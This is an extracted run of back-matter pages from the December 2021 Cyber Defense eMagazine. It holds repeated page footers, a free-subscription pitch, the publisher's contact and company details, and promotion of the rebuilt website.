<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 157<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 158<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 159<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 160<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong><strong>Defense</strong>.TV now has 200 hotseat interviews and growing…<br />
Market leaders, innovators, CEO hot seat interviews and much more.<br />
A division of <strong>Cyber</strong> <strong>Defense</strong> Media Group and sister to <strong>Cyber</strong> <strong>Defense</strong> Magazine.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 161<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Free Monthly <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> Via Email<br />
Enjoy our monthly electronic editions of our Magazines <strong>for</strong> FREE.<br />
This magazine is by and <strong>for</strong> ethical in<strong>for</strong>mation security professionals with a twist on innovative consumer<br />
products and privacy issues on top of best practices <strong>for</strong> IT security and Regulatory Compliance. Our<br />
mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best<br />
ideas, products and services in the in<strong>for</strong>mation technology industry. Our monthly <strong>Cyber</strong> <strong>Defense</strong> e-<br />
Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare<br />
arena plus we’ll in<strong>for</strong>m you as next generation and innovative technology vendors have news worthy of<br />
sharing with you – so enjoy. You get all of this <strong>for</strong> FREE, always, <strong>for</strong> our electronic editions. Click here<br />
to sign up today and within moments, you’ll receive your first email from us with an archive of our<br />
newsletters along with this month’s newsletter.<br />
By signing up, you’ll always be in the loop with CDM.<br />
Copyright (C) <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.<br />
SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a<br />
<strong>Cyber</strong><strong>Defense</strong>Awards.com, <strong>Cyber</strong><strong>Defense</strong>Magazine.com, <strong>Cyber</strong><strong>Defense</strong>Newswire.com,<br />
<strong>Cyber</strong><strong>Defense</strong>Professionals.com, <strong>Cyber</strong><strong>Defense</strong>Radio.com and <strong>Cyber</strong><strong>Defense</strong>TV.com, is a Limited Liability<br />
Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465, <strong>Cyber</strong><br />
<strong>Defense</strong> Magazine® is a registered trademark of <strong>Cyber</strong> <strong>Defense</strong> Media Group. EIN: 454-18-8465, DUNS#<br />
078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com<br />
All rights reserved worldwide. Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved. No part of this<br />
newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,<br />
recording, taping or by any in<strong>for</strong>mation storage retrieval system without the written permission of the publisher<br />
except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of<br />
the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may<br />
no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect<br />
the views of the publisher, and the publisher hereby disclaims any responsibility <strong>for</strong> them. Send us great content<br />
and we’ll post it in the magazine <strong>for</strong> free, subject to editorial approval and layout. Email us at<br />
marketing@cyberdefensemagazine.com<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />
276 Fifth Avenue, Suite 704, New York, NY 1000<br />
EIN: 454-18-8465, DUNS# 078358935.<br />
All rights reserved worldwide.<br />
marketing@cyberdefensemagazine.com<br />
www.cyberdefensemagazine.com<br />
NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)<br />
<strong>Cyber</strong> <strong>Defense</strong> Magazine - <strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> rev. date: 12/03/<strong>2021</strong><br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 162<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH<br />
(with others coming soon...)<br />
9+ Years in The Making…<br />
Thank You to our Loyal Subscribers!<br />
We've Completely Rebuilt <strong>Cyber</strong><strong>Defense</strong>Magazine.com - Please Let Us Know What You Think. It's mobile<br />
and tablet friendly and superfast. We hope you like it. In addition, we're past the five nines of 7x24x365<br />
uptime as we continue to scale with improved Web App Firewalls, Content Deliver Networks (CDNs)<br />
around the Globe, Faster and More Secure DNS and <strong>Cyber</strong><strong>Defense</strong>Magazine.com up and running as an<br />
array of live mirror sites and our new B2C consumer magazine <strong>Cyber</strong>SecurityMagazine.com. Millions of<br />
monthly readers and new plat<strong>for</strong>ms coming…starting with https://www.cyberdefenseprofessionals.com this<br />
month…<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 163<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 164<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 165<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 166<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 167<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 168<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.